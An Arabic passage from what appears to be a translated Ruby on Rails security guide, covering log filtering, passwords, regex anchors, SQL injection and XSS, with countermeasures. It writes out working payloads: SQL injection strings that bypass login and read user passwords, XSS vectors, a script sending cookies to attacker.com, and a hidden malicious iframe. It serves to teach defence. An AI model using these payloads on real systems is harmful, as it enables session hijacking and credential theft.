لاحظ أن هذا لا يحميك إلا من البرامج الآلية التلقائية، ولا يمكن إيقاف برامج التتبع المستهدفة المخصصة لذلك. وبالتالي، قد لا تكون اختبارات كابتشا السلبية جيدة لحماية نماذج تسجيل الدخول.

التسجيل

تحذير: أخبر ريلز بعدم وضع كلمات المرور في ملفات السجل (log files).

بشكل افتراضي، تسجل ريلز جميع الطلبات التي أجريت على تطبيق الويب. ولكن ملفات السجل يمكن أن تكون مشكلة أمنية كبيرة، لأنها قد تحتوي على بيانات اعتماد تسجيل الدخول وأرقام بطاقات الائتمان وما إلى ذلك. عند تصميم مفهوم أمان تطبيق ويب، يجب أن تفكر أيضًا في ما سيحدث إذا حصل أحد المهاجمين على (الوصول الكامل) إلى خادم الويب. سيكون تشفير الأسرار وكلمات المرور في قاعدة البيانات غير ذي جدوى إذا كانت ملفات السجل تسردها بنصٍّ واضحٍ. يمكنك تصفية معاملات طلب معينة من ملفات السجل الخاصة بك عن طريق إضافتها إلى config.filter_parameters في ضبط التطبيق. توضع العلامة [FILTERED] على هذه المعاملات في السجل.

config.filter_parameters << :password

ملاحظة: ترشح المعاملات المقدمة بواسطة التعبير العادي المطابق الجزئي. يضيف ريلز الافتراضي: كلمة المرور في المهيئ المناسب (initializers/filter_parameter_logging.rb) وتهتم بالمعاملين password و password_confirmation.

كلمات المرور الجيدة

ملاحظة: هل تجد صعوبة في تذكر كل كلمات المرور الخاصة بك؟ لا تدونها، ولكن استخدم الحروف الأولية لكل كلمة في جملة سهلة التذكر.

قام بروس شناير (Bruce Schneier)، وهو تقني أمني، بتحليل 34000 اسم مستخدم وكلمة مرور حقيقين من هجوم MySpace للتصيد الاحتيالي المذكور أدناه. اتضح أن معظم كلمات المرور من السهل جدًا اختراقها. كلمات المرور العشرين الأكثر شيوعًا هي:

password1
abc123
myspace1
password
blink182
qwerty1
****you
123abc
baseball1
football1
123456
soccer
monkey1
liverpool1
princess1
jordan23
slipknot1
superman1
iloveyou1
monkey

من المثير للاهتمام أن 4٪ فقط من كلمات المرور هذه كانت كلمات معجم وأن الأغلبية العظمى هي حروف أبجدية ورقمية. ومع ذلك، تحتوي قواميس مخترقي كلمة المرور على عدد كبير من كلمات المرور المستخدمة في يومنا هذا، إذ يجربون جميع أنواع التركيبات (الأبجدية والرقمية). إذا كان المهاجم يعرف اسم المستخدم الخاص بك وكنت تستخدم كلمة مرور ضعيفة، فسيخترق حسابك بسهولة.

كلمة المرور الجيدة هي تركيبة أبجدية رقمية طويلة من الحالات المختلطة. بما أنه من الصعب تذكر ذلك، فمن المستحسن أن ندخل فقط الأحرف الأولى من جملة يمكنك تذكرها بسهولة. على سبيل المثال، كلمة مرور مستخلصة من الجملة "The quick brown fox jumps over the lazy dog" ستكون "Tqbfjotld". لاحظ أن هذا مجرد مثال، أي لا يجب أن تستخدم عبارات معروفة مثل هذه، إذ قد تظهر في قواميس المخترقين أيضًا.

التعابير النمطية

ملاحظة: من الوقائع الشائعة في تعابير روبي النمطية هي مطابقة بداية السلسلة ونهايتها عبر ^ و $ ، بدلًا من ‎\A و ‎\z.

تستخدم روبي نهجًا مختلفًا بعض الشيء عن العديد من اللغات الأخرى لمطابقة نهاية وبداية سلسلة نصية. هذا هو السبب في أن العديد من الكتب التي تشرح روبي وريلز تخطئ بشرح هذه النقطة. إذن، كيف يكون هذا تهديدًا أمنيًا؟ لنفترض أنك تريد التحقق من صحة حقل عنوان URL بشكل غير صحيح وأنك استخدمت تعبيرًا نمطيًّا بسيطًا كالتالي:

/^https?:\/\/[^

هذا قد يعمل بشكل جيد في بعض اللغات. ومع ذلك، في روبي، يطابق المحرف ^ و $ بداية السطر ونهاية السطر. وبالتالي، فإن عنوان URL مثل هذا يجري عملية الترشيح بدون مشاكل:

javascript:exploit_code();/*
http://hi.com
*/

يجتاز عنوان URL هذا المرشح لأن التعبير النمطي يطابق السطر الثاني، ولا يهم البقية. الآن تخيل أنه لدينا وحدة عرض أظهرت عنوان URL مثل هذا:

link_to "Homepage", @user.homepage

يبدو الارتباط بسيطًا للزائرين، ولكن عند النقر عليه، سينفذ الدالة "exploit_code" التي تخص JavaScript أو أي دالة JavaScript أخرى يوفرها المهاجم. لإصلاح التعبير النمطي، يجب استخدام ‎\A و ‎\z بدلًا من ^ و $، مثل:

/\Ahttps?:\/\/[^\n]+\z/i

بما أن هذا خطأ متكرر، فإن مدقق الصياغة (validates_format_of) يطرح الآن استثناءً إذا كان التعبير النمطي المقدم يبدأ بـ ^ أو ينتهي بـ $. إذا كنت بحاجة إلى استخدام ^ و $ بدلًا من ‎\A و ‎\z (وهو أمر نادر الحدوث)، فيمكنك ضبط الخيار ‎:multiline إلى القيمة true، مثل:

# في أي مكان في السلسلة النصية "Meanwhile" سطرًا فيه content يجب أن يحوي
validates :content, format: { with: /^Meanwhile$/, multiline: true }

لاحظ أن هذا لا يحميك إلا من الخطأ الأكثر شيوعًا عند استخدام أداة التحقق من الصياغة، إذ عليك دائمًا أن تضع في اعتبارك أن ^ و $ يتطابقان مع بداية السطر ونهايته في روبي، وليس بداية ونهاية السلسلة.

زيادة الصلاحيات

تحذير: قد يؤدي تغيير معامل واحد إلى منح المستخدم وصولًا غير مصرح به. تذكر أنه قد يتغير كل معامل، بغض النظر عن مدى إخفاءه أو تشويشه.

المعامل الأكثر شيوعًا التي قد يعبث به المستخدم هو معامل المعرّف id، كما هو الحال في http://www.domain.com/project/1، الذي يمثِّل الرقم 1 فيه المعرف. سيكون المعرف متاحًا في params في وحدة التحكم. هناك، على الأرجح ستفعل شيئًا كالتالي:

@project = Project.find(params[:id])

هذا أمر لا بأس به بالنسبة لبعض تطبيقات الويب، ولكن بالتأكيد ليس إذا كان المستخدم غير مخول لعرض جميع المشاريع. إذا غيّر المستخدم المعرف إلى 42، ولا لم يكن يُسمح له برؤية تلك المعلومات، فسيكون بإمكانه الوصول إليها على أي حال. بدلًا من ذلك، استَعلِم عن حقوق وصول المستخدم أيضًا:

@project = @current_user.projects.find(params[:id])

اعتمادًا على تطبيق الويب الخاص بك، سيكون هناك العديد من المعاملات التي يمكن للمستخدم التلاعب بها. كقاعدة عامة، تعد البيانات التي يدخلها المستخدم غير آمنة حتى يثبت العكس؛ ومن المحتمل أن يُتلاعَب بكل معامل أعطي من طرف المستخدم.

لا تنخدع بالأمن عن طريق التعتيم وأمن JavaScript. تتيح لك أدوات المطوّرين مراجعة الحقول المخفية لكل نموذج وتغييرها. يمكن استخدام JavaScript للتحقق من صحة بيانات إدخال المستخدم، ولكن بالتأكيد لا يمنع المهاجمين من إرسال طلبات ضارة ذات قيم غير متوقعة. تسجل الإضافة Firebug من Mozilla Firefox كل طلب وقد تكرره وتغيره. هذه طريقة سهلة لتجاوز أي عمليات التحقق من طرف JavaScript. وهناك أيضًا الوسيط من جانب العميل (client-side proxies) الذي يسمح لك باعتراض أي طلب واستجابة من وإلى الإنترنت.

الحقن

ملاحظة: الحقن هو فئة من الهجمات التي تدخل رمز أو معاملات ضارة في تطبيق ويب من أجل تشغيله ضمن سياق الأمان الخاص به. الأمثلة البارزة للحقن هي البرمجة عبر المواقع (XSS) وحقن استعلامات SQL.

الحقن صعب للغاية، لأنه يمكن أن يكون تسلك نفس الشيفرة أو المعامل سلوكًا خبيثًا في سياق واحد، ولكنها تكون غير ضارة تمامًا في سياق آخر. يمكن أن يكون السياق عبارة عن لغة برمجة نصية أو استعلام أو لغة برمجة أو بيئة صدفة أو تابع روبي/ريلز. تغطي الأقسام التالية جميع السياقات المهمة التي قد تحدث فيها هجمات حقن. القسم الأول، يغطي حكمًا هيكليًا فيما يتعلق حقن.

القوائم البيضاء والقوائم السوداء

ملاحظة: عند تطهير شيء ما أو حمايته أو التحقق منه، يفضل اللجوء إلى القوائم البيضاء عوضًا عن القوائم السوداء.

يمكن أن تكون القائمة السوداء قائمة بعناوين البريد الإلكتروني السيئة أو الإجراءات غير العامة أو وسوم HTML غير الصحيحة. هذا يعارض القائمة البيضاء التي تسرد عناوين البريد الإلكتروني الجيدة، والإجراءات العامة، ووسوم HTML الجيدة وما إلى ذلك. على الرغم من أنه من غير الممكن في بعض الأحيان إنشاء قائمة بيضاء (في مرشح الرسائل غير المرغوب بها [SPAM filter] على سبيل المثال)، تفضل اعتماد منهج القائمة البيضاء:

  • استخدم before_action باستثناء: [...] بدلًا من: [...] للإجراءات المتعلقة بالأمان. بهذه الطريقة لا تنسَ أن تقوم بتمكين التحقق من الأمان للإجراءات المضافة حديثًا.
  • اسمح باستخدام <strong> بدلاً من إزالة <script> ضد هجمات XSS. انظر أدناه للحصول على التفاصيل.
  • لا تحاول تصحيح مدخلات المستخدم بواسطة القوائم السوداء:
    • ما يلي سيجعل الهجوم يعمل: ("","<sc<script>ript>".gsub("<script>"
    • لكن ارفض الإدخال غير الصحيح.

القوائم البيضاء هي أيضًا وسيلة جيدة ضد العامل البشري في نسيان شيء ما في القائمة السوداء.

حقن SQL

ملاحظة: بفضل التوابع الذكية، لا يعد ذلك مشكلة في معظم تطبيقات ريلز. ومع ذلك، هذا هجوم مدمر وشائع في تطبيقات الويب، لذلك من المهم فهم مسبباته.

المقدمة

تهدف هجمات حقن SQL إلى التأثير على استعلامات قاعدة البيانات عن طريق معالجة معاملات تطبيق الويب. الهدف الشائع من هجمات حقن SQL هو تجاوز التفويض. هدف آخر هو تنفيذ معالجة البيانات أو قراءة البيانات التعسفية. في ما يلي مثال على كيفية عدم استخدام بيانات مدخلة من طرف المستخدم في استعلام:

Project.where("name = '#{params[:name]}'")

قد يكون هذا في إجراء بحث ويمكن للمستخدم إدخال اسم مشروع يريد العثور عليه. إذا قام مستخدم ضار بإدخال --OR 1'، فإنَّ استعلام SQL الناتج سيكون:

SELECT * FROM projects WHERE name = '' OR 1 --'

تبدأ الشرطتان تعليقًا يتجاهل كل شيء بعده. لذا يرجع الاستعلام كافة السجلات من جدول المشاريع بما في ذلك المحجوبة للمستخدم. وذلك لأن الشرط صحيح لجميع السجلات.

تجاوز التخويل

عادة ما يتضمن تطبيق الويب التحكم في الوصول. يُدخِل المستخدم بيانات اعتماد تسجيل الدخول الخاصة به ويحاول تطبيق الويب العثور على السجل المطابق في جدول المستخدمين. يمنح التطبيق الوصول عندما يجد سجلًا. ومع ذلك، قد يتجاوز المهاجم هذا التحقق باستخدام حقن تعليمة SQL. يعرض المثال التالي استعلامًا نموذجيًا لقاعدة البيانات في ريلز للعثور على السجل الأول في جدول المستخدمين الذي يطابق معاملات بيانات اعتماد تسجيل الدخول التي يوفرها المستخدم.

User.find_by("login = '#{params[:name]}' AND password = '#{params[:password]}'")

إذا قام المهاجم بإدخال 'OR' 1 '=' 1 كاسم، و 'OR' 2 '>' 1 ككلمة مرور، فسيكون استعلام SQL الناتج:

SELECT * FROM users WHERE login = '' OR '1'='1' AND password = '' OR '2'>'1' LIMIT 1

سيجد هذا ببساطة السجل الأول في قاعدة البيانات، ويمنح الوصول إلى هذا المستخدم.

القراءة غير المصرح بها

تربط التعليمة UNION استعملامين اثنين من استعلامات SQL وتعيد البيانات في مجموعة واحدة. يمكن للمهاجم استخدامها لقراءة البيانات التعسفية من قاعدة البيانات. لنأخذ المثال من الأعلى:

Project.where("name = '#{params[:name]}'")

والآن دعونا نحقن استعلام آخر باستخدام التعليمة UNION:

') UNION SELECT id,login AS name,password AS description,1,1,1 FROM users --

سيؤدي ذلك إلى استعلام SQL التالي:

SELECT * FROM projects WHERE (name = '') UNION
  SELECT id,login AS name,password AS description,1,1,1 FROM users --'

لن تكون النتيجة قائمة مشاريع (لأنه لا يوجد مشروع باسم فارغ)، ولكن قائمة بأسماء المستخدمين وكلمات المرور الخاصة بهم. نأمل أن تكون كلمات المرور مشفرة في قاعدة البيانات! المشكلة الوحيدة للمهاجم هي أن عدد الأعمدة يجب أن يكون هو نفسه في كلا الاستعلامات. هذا هو السبب في أن الاستعلام الثاني يتضمن قائمة من الواحدات (1)، والتي ستكون دائمًا القيمة 1، لمطابقة عدد الأعمدة في طلب البحث الأول.

أيضًا، يعيد الاستعلام الثاني تسمية بعض الأعمدة باستخدام التعليمة AS بحيث يعرض تطبيق الويب القيم من جدول المستخدم. تأكد من تحديث ريلز الخاصة بك إلى الإصدار 2.1.1 على أقل تقدير.

التدابير المضادة

يحتوي ريلز على مرشح مدمج لمحارف تعليمات SQL الخاصة الذي سيُهرِّب المحرف '، و "، و NULL وفواصل الأسطر. يطبق استخدام 

(Model.find(id أو (Model.find_by_some thing(something هذا الأمر تلقائيًا. ولكن في أجزاء تعليمات SQL، خاصة في أجزاء الشروط (where("...")‎) أو التابعين ()connection.execute أو ()Model.find_by_sql، يجب أن تطبق يدويًا.

بدلًا من تمرير سلسلة إلى خيار الشروط، يمكنك تمرير مصفوفة لتعقيم السلاسل الملوثة مثل:

Model.where("login = ? AND password = ?", entered_user_name, entered_password).first

كما ترى، الجزء الأول من المصفوفة عبارة عن جزء من تعليمة SQL يحتوي على علامات استفهام. الإصدارات المعقمة للمتغيرات في الجزء الثاني من المصفوفة تحل محل علامات الاستفهام. أو يمكنك تمرير جدول Hash لنفس النتيجة:

Model.where(login: entered_user_name, password: entered_password).first

شكل المصفوفة أو الجدول Hash متاح فقط في الحالات النموذجية. يمكنك تجريب ()sanitize_sql في مكان آخر. اجعل التفكير في العواقب الأمنية عند استخدام سلسلة خارجية في SQL عادةً لك.

البرمجة عبر المواقع (XSS)

ملاحظة: هذا النوع من الهجمات هي الأكثر انتشارًا، وأحد أكثر نقاط الضعف الأمنية تدميرًا في تطبيقات الويب. هذا الهجوم الخبيث يضخ رمزًا تنفيذيًا من جانب العميل. يوفر ريلز توابع مساعدة لإيقاف هذه الهجمات.

نقاط الدخول

منفذ شن المهاجم هجومه هو عنوان URL ضعيف ومعاملاته.

منافذ بدء شن الهجوم الأكثر شيوعًا هي منشورات الرسائل وتعليقات المستخدمين وكتب الزائرين، ولكن عناوين المشروعات وأسماء المستندات وصفحات نتائج البحث كانت أيضًا عرضة، إذ تعد الأماكن حيث يمكن للمستخدم إدخال البيانات فيها منافذ محتملة لشن الهجوم. ولكن لا يجب بالضرورة أن تأتي المدخلات من مربعات الإدخال على مواقع الويب، إذ فيمكن أن تكون في أي معامل URL - واضح أو مخفي أو داخلي. تذكر أن المستخدم قد يعترض أي حركة مرور للبيانات. تجعل التطبيقات أو وكلاء موقع العميل من السهل تغيير الطلبات. هناك أيضًا أماكن أخرى محتملة للهجوم مثل الإعلانات.

تعمل هجمات XSS بالشكل التالي: يحقن أحد المهاجمين بعض الرموز، ويحفظه تطبيق الويب ويعرضه على صفحة، يُقدم لاحقًا إلى أحد الضحايا. تعرض معظم أمثلة XSS ببساطة مربع تنبيه، لكنها أقوى من ذلك. يمكن لهجمات XSS سرقة ملف تعريف الارتباط، أو خطف الجلسة، أو إعادة توجيه الضحية إلى موقع ويب مزيف، أو عرض إعلانات لصالح المهاجم، أو تغيير العناصر على موقع الويب للحصول على معلومات سرية أو تثبيت برامج ضارة من خلال ثغرات أمنية في متصفح الويب.

خلال النصف الثاني من عام 2007، سجلت 88 نقطة ضعف في متصفحات موزيلا، و 22 نقطة في سفاري، و 18 نقطة في IE، و 12 نقطة في أوبرا. كما وثق تقرير التهديدات العالمية لأمن الإنترنت من سيمانتك 239 نقطة ضعف في إضافات المتصفحات في الأشهر الستة الأخيرة من عام 2007. ويعد Mpack إطارًا نشطًا وحديثًا للهجوم يستغل هذه الثغرات الأمنية. بالنسبة للمتسللين الإجراميين، فإنه من الأمور الجذابة للغاية استغلال ثغرة حقن SQL في إطار تطبيق ويب وإدراج شفرة خبيثة في كل عمود جدول نصي. في أبريل / نيسان 2008، اختُرِق أكثر من 510،000 موقع بهذا الشكل، من بينها موقع الحكومة البريطانية والأمم المتحدة والعديد من المواقع البارزة.

حقن شيفرة HTML/JavaScript

تعد اللغة الأكثر شيوعًا في هجمات XSS هي لغة JavaScript الشائعة الاستخدام في البرمجة من طرف العميل، غالبًا مع HTML. لذلك، يعد تهريب مدخلات المستخدم أمرًا ضروريًّا.

إليك أبسطة اختبار للتحقق من هجمات XSS:

<script>alert('Hello');</script>

ستعرض شيفرة JavaScript هذه ببساطة مربع تنبيه. الأمثلة التالية تفعل الشيء نفسه تمامًا، فقط في أماكن غير شائعة جدًا:

<img src=javascript:alert('Hello')>
<table background="javascript:alert('Hello')">
سرقة ملفات تعريف الارتباط

هذه الأمثلة لا تسبب أي ضرر حتى الآن، لذلك دعنا نرى كيف يمكن للمهاجم سرقة ملف تعريف الارتباط الخاص بالمستخدم (وبالتالي اختطاف جلسة المستخدم). في JavaScript، يمكنك استخدام الخاصية document.cookie لقراءة ملف تعريف ارتباط الصفحة والكتابة عليه. يفرض JavaScript تطبيق سياسة المصدر الواحد (same origin policy)، مما يعني أن برنامجًا نصيًّا من أحد النطاقات لا يمكنه الوصول إلى ملفات تعريف ارتباط نطاق آخر. تحمل الخاصية document.cookie ملف تعريف ارتباط خادم الويب الأصلي. ومع ذلك، يمكنك قراءة هذه الخاصية والكتابة عليها إذا ضمّنت الشيفرة مباشرة في صفحة HTML (كما يحدث مع XSS). احقن الشيفرة التالية في أي مكان في تطبيق الويب الخاص بك لرؤية ملف تعريف الارتباط الخاص بك في صفحة النتائج:

<script>document.write(document.cookie);</script>

بالنسبة للمهاجم، بالطبع، هذا ليس مفيدًا، حيث سيرى الضحية ملف تعريف الارتباط الخاص به. سيحاول المثال التالي تحميل صورة من العنوان http://www.attacker.com/‎ بالإضافة إلى ملف تعريف الارتباط. بالطبع هذا العنوان غير موجود، لذلك لا يعرض المتصفح أي شيء. ولكن يمكن للمهاجم مراجعة ملفات الدخول إلى خادم الويب الخاص به لرؤية ملف تعريف الارتباط الخاص بالضحية.

<script>document.write('<img src="http://www.attacker.com/' + document.cookie + '">');</script>

ستقرأ ملفات السجل على www.attacker.com على النحو التالي:

GET http://www.attacker.com/_app_session=836c1c25278e5b321d6bea4f19cb57e2

يمكنك تخفيف هذه الهجمات (بطريقة واضحة) بإضافة الراية httpOnly إلى ملفات تعريف الارتباط، بحيث لا يمكن قراءة document.cookie بواسطة JavaScript. يمكن استخدام ملفات تعريف الارتباط التي تخص HTTP فقط بدءًا من IE v6.SP1 و Firefox v2.0.0.5 و Opera 9.5 و Safari 4 و Chrome 1.0.154. إلا أن المتصفحات القديمة الأخرى (مثل WebTV و IE 5.5 على Mac) يمكن أن تتسبب في فشل تحميل الصفحة. كن حذرًا من أن ملفات تعريف الارتباط ستظل مرئية باستخدام Ajax مع ذلك.

التشويه

مع تشويه صفحة الويب، يمكن للمهاجم القيام بالكثير من الأشياء مثل تقديم معلومات خاطئة أو إغراء الضحية لدخول موقع المهاجم على الإنترنت لسرقة ملف تعريف الارتباط أو بيانات اعتماد تسجيل الدخول أو بيانات حساسة أخرى. الطريقة الأكثر شيوعًا هي تضمين شيفرة من مصادر خارجية بواسطة إطارات iframe:

<iframe name="StatPage" src="http://58.xx.xxx.xxx" width=5 height=5 style="display:none"></iframe>

يؤدي هذا إلى تحميل شيفرة HTML و / أو JavaScript عشوائيًا من مصدر خارجي وتضمينها كجزء من الموقع. أخذت الشيفرة السابقة للإطار iframe من هجوم فعلي نُفِّذ على مواقع إيطالية شرعية باستخدام إطار الهجوم Mpack. يحاول الإطار Mpack تثبيت برامج ضارة من خلال ثغرات أمنية في متصفح الويب، إذ نسبة نجاح هذا الهجوم كبيرة تصل إلى 50٪ من الهجمات.

يمكن أن يتداخل الهجوم أكثر تخصصًا مع موقع الويب بالكامل أو يعرض نموذج تسجيل الدخول، الذي يشبه نموذج الموقع الأصلي، ولكنه ينقل اسم المستخدم وكلمة المرور إلى موقع المهاجم. أو يمكنه استخدام CSS و / أو JavaScript لإخفاء رابط مشروع في تطبيق الويب، وعرض رابط آخر في مكانه يعيد التوجيه إلى موقع ويب مزيف.

هجمات الحقن المنعكس هي تلك التي لا تخزن الحمولة فيها لعرضها على الضحية في وقت لاحق، و لكنها مدرجة في عنوان URL. نماذج البحث الخاصة تفشل في الهروب من سلسلة البحث. قدم الرابط التالي صفحة ذكرت أن "جورج بوش عين صبيًا في التاسعة من عمره ليكون رئيسًا ...":

http://www.cbsnews.com/stories/2002/02/15/weather_local/main501644.shtml?zipcode=1-->

 <script src=http://www.securitylab.ru/test/sc.js></script>